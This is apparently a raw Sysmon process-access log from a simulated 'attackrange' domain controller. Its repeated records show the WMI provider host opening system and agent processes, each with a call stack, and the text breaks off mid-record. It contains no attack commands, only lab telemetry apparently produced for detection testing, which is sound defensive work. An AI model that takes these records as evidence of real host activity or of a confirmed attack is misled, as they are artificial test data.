15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027499Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027498Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027497Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027496Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027495Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027494Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027493Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program 